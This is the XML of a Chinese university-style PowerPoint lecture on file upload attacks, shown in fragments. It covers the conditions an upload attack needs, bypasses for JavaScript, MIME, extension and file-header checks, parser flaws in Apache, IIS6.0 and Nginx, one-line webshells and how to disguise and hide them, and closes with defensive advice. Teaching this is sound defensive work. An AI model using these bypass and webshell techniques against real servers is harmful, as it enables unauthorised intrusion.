              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>小马基本上已经被一句话木马所代替</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大马可实现的功能与网站管理员所使用的功能非常类似</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件操作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列举目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息查看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数据库操作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命令执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>批量挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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705600" y="1219200"/>
            <a:ext cx="48768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(empty($_GET['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']))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$_GET['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$current =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htmlentities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($_SERVER['PHP_SELF']. "?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=". $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49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木马防范建议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使用和及时更新防护类工具和产品</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对服务器的文件夹设置严格的读写权限，并最小化当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用用户权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在对外服务时禁用一些敏感的危险函数，如命令执行类函数等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定期观察系统服务器管理器中的服务，检查是否有病毒新建的服务进程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定期检查系统进程，查看是否有可疑的进程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38279C-911A-4E84-851D-45DE48F574EF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AF809-11BA-4A24-812C-DC8FA9DD4A0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752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E2A76C-9C0F-48CC-81A2-64CAE151A422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835A3D-0B72-4F5F-AF1D-7DF59AD9D8B3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500">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>问题？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上传攻击的定义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应用中，每个人都会接触到上传功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头像上传</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在重大安全隐患，上传点可作为上传木马的有效途径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传攻击的定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用对上传文件过滤不严的漏洞，将应用程序定义类型范围之外的文件上传到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，并且此类文件通常为木马，在上传成功后攻击者即可获得当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webshell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328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上传攻击的原理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想要获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器的权限，最直接的方法就是把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马插入服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如：上传木马文件，并以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为后缀名保存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上传木马的过程就是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中新增一个页面，当木马上传成功后，攻击者就可以访问这个木马文件了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器漏洞的前提：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在上传点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以访问控制上传的文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上传的文件可以被解析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013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上传的标准业务流程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客户端上传功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表单提交</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中间件上传功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接收表单 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储为临时文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保持为正式文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器存储及调用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正式存储文件，放在指定的真实路径中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的网页动态语言（如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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）中，上传功能及可利用的木马均不同，但利用思路基本一致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8886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上传攻击的条件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四个必要条件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标网站具有上传功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上传的目标文件能够被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器解析执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>知道文件上次到服务器后的存放路径和文件名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标文件可被用户访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作为防范方，至少解决其中一项问题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1509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上传检测和绕过技术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 err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测及绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检测及绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端文件扩展名检测及绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端文件内容检测及绕过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0063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检测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74" y="1295400"/>
            <a:ext cx="9944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1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绕过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直接发送请求包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Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抓到正常上传的请求报文后，修改报文的内容，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，便跳过了网页中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的验证过程。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JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>去修改其中关键的检测函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>noscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>插件禁用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5806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2869</TotalTime>
  <Words>1834</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>274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华文新魏</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>300TGp_natural_light</vt:lpstr>
      <vt:lpstr>第六讲 文件上传攻击</vt:lpstr>
      <vt:lpstr>课程内容</vt:lpstr>
      <vt:lpstr>上传攻击的定义</vt:lpstr>
      <vt:lpstr>上传攻击的原理</vt:lpstr>
      <vt:lpstr>上传的标准业务流程</vt:lpstr>
      <vt:lpstr>上传攻击的条件</vt:lpstr>
      <vt:lpstr>上传检测和绕过技术</vt:lpstr>
      <vt:lpstr>客户端JavaScript检测</vt:lpstr>
      <vt:lpstr>客户端JavaScript绕过</vt:lpstr>
      <vt:lpstr>服务端MIME类型检测</vt:lpstr>
      <vt:lpstr>服务端MIME类型绕过</vt:lpstr>
      <vt:lpstr>服务器端文件扩展名检测-黑名单</vt:lpstr>
      <vt:lpstr>服务端文件扩展名检测-黑名单绕过</vt:lpstr>
      <vt:lpstr>服务器文件内容检测-文件头</vt:lpstr>
      <vt:lpstr>文件解析攻击</vt:lpstr>
      <vt:lpstr>Apache解析漏洞攻击</vt:lpstr>
      <vt:lpstr>IIS6.0解析漏洞</vt:lpstr>
      <vt:lpstr>Nginx解析漏洞攻击</vt:lpstr>
      <vt:lpstr>Web木马</vt:lpstr>
      <vt:lpstr>一句话木马</vt:lpstr>
      <vt:lpstr>WEBSHELL之PHP一句话木马解读</vt:lpstr>
      <vt:lpstr>Web木马的特点</vt:lpstr>
      <vt:lpstr>一句话木马的变形技巧</vt:lpstr>
      <vt:lpstr>更换执行数据来源</vt:lpstr>
      <vt:lpstr>字符替换或特殊编码（在后端恶意脚本里）</vt:lpstr>
      <vt:lpstr>木马隐匿手段</vt:lpstr>
      <vt:lpstr>小马与大马</vt:lpstr>
      <vt:lpstr>木马防范建议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218</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-11T16:06:00Z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